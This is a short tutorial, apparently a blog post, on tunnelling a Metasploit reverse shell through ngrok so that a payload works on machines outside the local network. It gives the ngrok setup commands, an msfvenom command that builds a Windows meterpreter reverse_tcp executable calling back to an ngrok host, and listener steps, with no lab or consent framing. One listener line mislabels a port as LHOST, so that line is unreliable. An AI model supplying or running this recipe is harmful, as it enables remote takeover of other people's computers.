- Downloading NGROK and setting up an account
- Using it in msfvenom
- Starting a listener
Setting up NGROK
Setting up ngrok is fairly simple.
Go to their website, make an account and when logged in, download the linux executable for Debian. There are instructions on their website and they are well documented, so I won’t go through all of them here.
After running :
| $ ./ngrok authtoken [TOKEN] |
Start ngrok using the tcp protocol. Like this:
| $ ./ngrok tcp 4444 |
Done! You should see a link like this:
| tcp://2.tcp.ngrok.io:15096 |
Keep that terminal running while you make a payload using msfvenom(previous tutorial) but you MUST use the address and port from the link in the ngrok window, like this:
Generating the payload
| $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15096 >> output.exe |
Done! Now you can start a Metasploit listener, but like described under.
Metasploit listener
While starting the listener everything is usual, just make sure to use the same port as in the ngrok window(NOT LIKE IN THE PAYLOAD!!).
| > set LHOST 4444 |
Everything else shall stay the same. Run the listener
Executing the payload and finishing up
This is the end. Now everything is set up. After executing the program on another machine outside of LAN we will still get a session in the Metasploit window! Congrats!
